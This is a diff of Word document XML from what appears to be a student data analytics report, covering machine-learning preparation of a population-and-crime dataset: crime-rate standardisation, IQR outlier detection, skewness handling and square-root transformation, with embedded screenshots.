+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:u w:color="000000"/>
+          <w:lang w:val="en-IE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="5" w:name="_Toc59959352"/>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
           <w:b w:val="0"/>
@@ -11026,26 +10596,1183 @@
           <w:u w:color="000000"/>
           <w:lang w:val="fr-FR"/>
         </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="5" w:name="_Toc59959352"/>
+        <w:t xml:space="preserve">3.0 </w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="5"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+        </w:rPr>
+        <w:t>Machine Learning for Data Analysis</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+          <w:lang w:val="en-IE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+          <w:lang w:val="en-IE"/>
+        </w:rPr>
+        <w:t>For the purpose of developing a machine learning model, I will utilize the new generated dataset, Pop_and_crime_df.csv. To prepare the data for Machine Learning, I will standardize the crime rate providing the crime rate per 100,000 people, which is a common way to standardize crime rates for comparison.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+          <w:lang w:val="en-IE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+          <w:lang w:val="en-IE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">These tasks will be performed in the jupyter notebook: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>MSC_DA_CA1_Jose_Mario</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>.ipynb</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+          <w:lang w:val="en-IE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+          <w:lang w:val="en-IE"/>
+        </w:rPr>
+        <w:t>Phase 4 - Machine Learning</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+          <w:lang w:val="en-IE"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Handling with Outliers</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>and</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Skewness</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:t>In the Machine Learning phase, it is crucial to address skewness, handle outliers, and standardize the data.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">To identify potential outliers, statistical methods like the Z-score or the Interquartile Range (IQR) can be employed. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Considering that this dataset is highly skewed, the IQR method is the more appropriate choice for identifying potential outliers.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:t>After applying the IQR method, we have a table with the rows with outliers:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69796BBB" wp14:editId="7226DC11">
+            <wp:extent cx="4819287" cy="2941175"/>
+            <wp:effectExtent l="0" t="0" r="635" b="0"/>
+            <wp:docPr id="1036213183" name="Picture 1" descr="A screenshot of a computer screen&#10;&#10;Description automatically generated"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1036213183" name="Picture 1" descr="A screenshot of a computer screen&#10;&#10;Description automatically generated"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId25"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4827838" cy="2946394"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="en-IE"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:bevel/>
+          </w14:textOutline>
+        </w:rPr>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wps">
+            <w:drawing>
+              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251669504" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3F811877" wp14:editId="16C03FF1">
+                <wp:simplePos x="0" y="0"/>
+                <wp:positionH relativeFrom="column">
+                  <wp:posOffset>3108960</wp:posOffset>
+                </wp:positionH>
+                <wp:positionV relativeFrom="paragraph">
+                  <wp:posOffset>1292860</wp:posOffset>
+                </wp:positionV>
+                <wp:extent cx="2578100" cy="2368550"/>
+                <wp:effectExtent l="0" t="0" r="12700" b="12700"/>
+                <wp:wrapNone/>
+                <wp:docPr id="166474852" name="Text Box 1"/>
+                <wp:cNvGraphicFramePr/>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
+                    <wps:wsp>
+                      <wps:cNvSpPr txBox="1"/>
+                      <wps:spPr>
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="2578100" cy="2368550"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                        <a:solidFill>
+                          <a:schemeClr val="lt1"/>
+                        </a:solidFill>
+                        <a:ln w="6350">
+                          <a:solidFill>
+                            <a:prstClr val="black"/>
+                          </a:solidFill>
+                        </a:ln>
+                      </wps:spPr>
+                      <wps:txbx>
+                        <w:txbxContent>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="BodyA"/>
+                              <w:jc w:val="center"/>
+                              <w:rPr>
+                                <w:b/>
+                                <w:bCs/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:b/>
+                                <w:bCs/>
+                              </w:rPr>
+                              <w:t>Skewness vs outliers:</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="BodyA"/>
+                              <w:jc w:val="both"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t>As result, we have 19 columns skewed,  some are right skewed and others left skewed.</w:t>
+                            </w:r>
+                            <w:r>
+                              <w:t xml:space="preserve"> </w:t>
+                            </w:r>
+                            <w:r>
+                              <w:t>Given that the dataframe has 21 rows, opting to remove outliers would result in the elimination of 15 rows. In this scenario, the best approach is by transforming the data to mitigate skewness rather than dropping outliers.</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:rPr>
+                                <w:lang w:val="en-US"/>
+                              </w:rPr>
+                            </w:pPr>
+                          </w:p>
+                        </w:txbxContent>
+                      </wps:txbx>
+                      <wps:bodyPr rot="0" spcFirstLastPara="0" vertOverflow="overflow" horzOverflow="overflow" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" spcCol="0" rtlCol="0" fromWordArt="0" anchor="t" anchorCtr="0" forceAA="0" compatLnSpc="1">
+                        <a:prstTxWarp prst="textNoShape">
+                          <a:avLst/>
+                        </a:prstTxWarp>
+                        <a:noAutofit/>
+                      </wps:bodyPr>
+                    </wps:wsp>
+                  </a:graphicData>
+                </a:graphic>
+                <wp14:sizeRelH relativeFrom="margin">
+                  <wp14:pctWidth>0</wp14:pctWidth>
+                </wp14:sizeRelH>
+                <wp14:sizeRelV relativeFrom="margin">
+                  <wp14:pctHeight>0</wp14:pctHeight>
+                </wp14:sizeRelV>
+              </wp:anchor>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
+              <v:shape w14:anchorId="3F811877" id="Text Box 1" o:spid="_x0000_s1029" type="#_x0000_t202" style="position:absolute;margin-left:244.8pt;margin-top:101.8pt;width:203pt;height:186.5pt;z-index:251669504;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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" fillcolor="white [3201]" strokeweight=".5pt">
+                <v:textbox>
+                  <w:txbxContent>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="BodyA"/>
+                        <w:jc w:val="center"/>
+                        <w:rPr>
+                          <w:b/>
+                          <w:bCs/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:b/>
+                          <w:bCs/>
+                        </w:rPr>
+                        <w:t>Skewness vs outliers:</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="BodyA"/>
+                        <w:jc w:val="both"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t>As result, we have 19 columns skewed,  some are right skewed and others left skewed.</w:t>
+                      </w:r>
+                      <w:r>
+                        <w:t xml:space="preserve"> </w:t>
+                      </w:r>
+                      <w:r>
+                        <w:t>Given that the dataframe has 21 rows, opting to remove outliers would result in the elimination of 15 rows. In this scenario, the best approach is by transforming the data to mitigate skewness rather than dropping outliers.</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:rPr>
+                          <w:lang w:val="en-US"/>
+                        </w:rPr>
+                      </w:pPr>
+                    </w:p>
+                  </w:txbxContent>
+                </v:textbox>
+              </v:shape>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wps">
+            <w:drawing>
+              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251668480" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1EDE23F9" wp14:editId="5C0B9F49">
+                <wp:simplePos x="0" y="0"/>
+                <wp:positionH relativeFrom="margin">
+                  <wp:align>right</wp:align>
+                </wp:positionH>
+                <wp:positionV relativeFrom="paragraph">
+                  <wp:posOffset>613410</wp:posOffset>
+                </wp:positionV>
+                <wp:extent cx="6064250" cy="3505200"/>
+                <wp:effectExtent l="0" t="0" r="12700" b="19050"/>
+                <wp:wrapTopAndBottom/>
+                <wp:docPr id="894842312" name="Text Box 2"/>
+                <wp:cNvGraphicFramePr>
+                  <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/>
+                </wp:cNvGraphicFramePr>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
+                    <wps:wsp>
+                      <wps:cNvSpPr txBox="1">
+                        <a:spLocks noChangeArrowheads="1"/>
+                      </wps:cNvSpPr>
+                      <wps:spPr bwMode="auto">
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="6064250" cy="3505200"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                        <a:solidFill>
+                          <a:srgbClr val="FFFFFF"/>
+                        </a:solidFill>
+                        <a:ln w="9525">
+                          <a:solidFill>
+                            <a:srgbClr val="000000"/>
+                          </a:solidFill>
+                          <a:miter lim="800000"/>
+                          <a:headEnd/>
+                          <a:tailEnd/>
+                        </a:ln>
+                      </wps:spPr>
+                      <wps:txbx>
+                        <w:txbxContent>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="BodyA"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:noProof/>
+                              </w:rPr>
+                              <w:drawing>
+                                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60B3B3C9" wp14:editId="1042BC61">
+                                  <wp:extent cx="2660650" cy="3404870"/>
+                                  <wp:effectExtent l="0" t="0" r="6350" b="5080"/>
+                                  <wp:docPr id="1685088419" name="Picture 1" descr="A screenshot of a data&#10;&#10;Description automatically generated"/>
+                                  <wp:cNvGraphicFramePr>
+                                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                                  </wp:cNvGraphicFramePr>
+                                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                                        <pic:nvPicPr>
+                                          <pic:cNvPr id="1685088419" name="Picture 1" descr="A screenshot of a data&#10;&#10;Description automatically generated"/>
+                                          <pic:cNvPicPr/>
+                                        </pic:nvPicPr>
+                                        <pic:blipFill>
+                                          <a:blip r:embed="rId26"/>
+                                          <a:stretch>
+                                            <a:fillRect/>
+                                          </a:stretch>
+                                        </pic:blipFill>
+                                        <pic:spPr>
+                                          <a:xfrm>
+                                            <a:off x="0" y="0"/>
+                                            <a:ext cx="2660650" cy="3404870"/>
+                                          </a:xfrm>
+                                          <a:prstGeom prst="rect">
+                                            <a:avLst/>
+                                          </a:prstGeom>
+                                        </pic:spPr>
+                                      </pic:pic>
+                                    </a:graphicData>
+                                  </a:graphic>
+                                </wp:inline>
+                              </w:drawing>
+                            </w:r>
+                          </w:p>
+                        </w:txbxContent>
+                      </wps:txbx>
+                      <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0">
+                        <a:noAutofit/>
+                      </wps:bodyPr>
+                    </wps:wsp>
+                  </a:graphicData>
+                </a:graphic>
+                <wp14:sizeRelH relativeFrom="margin">
+                  <wp14:pctWidth>0</wp14:pctWidth>
+                </wp14:sizeRelH>
+                <wp14:sizeRelV relativeFrom="margin">
+                  <wp14:pctHeight>0</wp14:pctHeight>
+                </wp14:sizeRelV>
+              </wp:anchor>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
+              <v:shape w14:anchorId="1EDE23F9" id="_x0000_s1030" type="#_x0000_t202" style="position:absolute;margin-left:426.3pt;margin-top:48.3pt;width:477.5pt;height:276pt;z-index:-251648000;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:3.6pt;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:3.6pt;mso-position-horizontal:right;mso-position-horizontal-relative:margin;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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">
+                <v:textbox>
+                  <w:txbxContent>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="BodyA"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:noProof/>
+                        </w:rPr>
+                        <w:drawing>
+                          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60B3B3C9" wp14:editId="1042BC61">
+                            <wp:extent cx="2660650" cy="3404870"/>
+                            <wp:effectExtent l="0" t="0" r="6350" b="5080"/>
+                            <wp:docPr id="1685088419" name="Picture 1" descr="A screenshot of a data&#10;&#10;Description automatically generated"/>
+                            <wp:cNvGraphicFramePr>
+                              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                            </wp:cNvGraphicFramePr>
+                            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                                  <pic:nvPicPr>
+                                    <pic:cNvPr id="1685088419" name="Picture 1" descr="A screenshot of a data&#10;&#10;Description automatically generated"/>
+                                    <pic:cNvPicPr/>
+                                  </pic:nvPicPr>
+                                  <pic:blipFill>
+                                    <a:blip r:embed="rId26"/>
+                                    <a:stretch>
+                                      <a:fillRect/>
+                                    </a:stretch>
+                                  </pic:blipFill>
+                                  <pic:spPr>
+                                    <a:xfrm>
+                                      <a:off x="0" y="0"/>
+                                      <a:ext cx="2660650" cy="3404870"/>
+                                    </a:xfrm>
+                                    <a:prstGeom prst="rect">
+                                      <a:avLst/>
+                                    </a:prstGeom>
+                                  </pic:spPr>
+                                </pic:pic>
+                              </a:graphicData>
+                            </a:graphic>
+                          </wp:inline>
+                        </w:drawing>
+                      </w:r>
+                    </w:p>
+                  </w:txbxContent>
+                </v:textbox>
+                <w10:wrap type="topAndBottom" anchorx="margin"/>
+              </v:shape>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
+      </w:r>
+      <w:r>
+        <w:t>For skewness, a</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">s we have more columns, I've implemented a </w:t>
+      </w:r>
+      <w:r>
+        <w:t>“F</w:t>
+      </w:r>
+      <w:r>
+        <w:t>or</w:t>
+      </w:r>
+      <w:r>
+        <w:t>”</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> loop to identify and print the skewness only when it exceeds the threshold.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+      </w:pPr>
+      <w:r>
+        <w:t>For data transformation, we need to understand the skewness, for right skewness we can apply some transformation methods, whereas for left skewness, we need to apply another transformation.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+      </w:pPr>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>Square Root:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="268FAB77" wp14:editId="2B806F38">
+            <wp:extent cx="2721429" cy="2160524"/>
+            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
+            <wp:docPr id="157292078" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="157292078" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId27"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="2733966" cy="2170477"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19616ABE" wp14:editId="01FFE222">
+            <wp:extent cx="2748587" cy="1817914"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="2103227017" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="2103227017" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId28"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="2761583" cy="1826510"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F46AD52" wp14:editId="2BB8C8DA">
+            <wp:extent cx="2721479" cy="1873523"/>
+            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
+            <wp:docPr id="1624891173" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1624891173" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId29"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="2737249" cy="1884379"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14B2F3CD" wp14:editId="5B36D2BB">
+            <wp:extent cx="3287016" cy="1488258"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="258703134" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="258703134" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId30"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="3308612" cy="1498036"/>
+                    </a:xfrm>
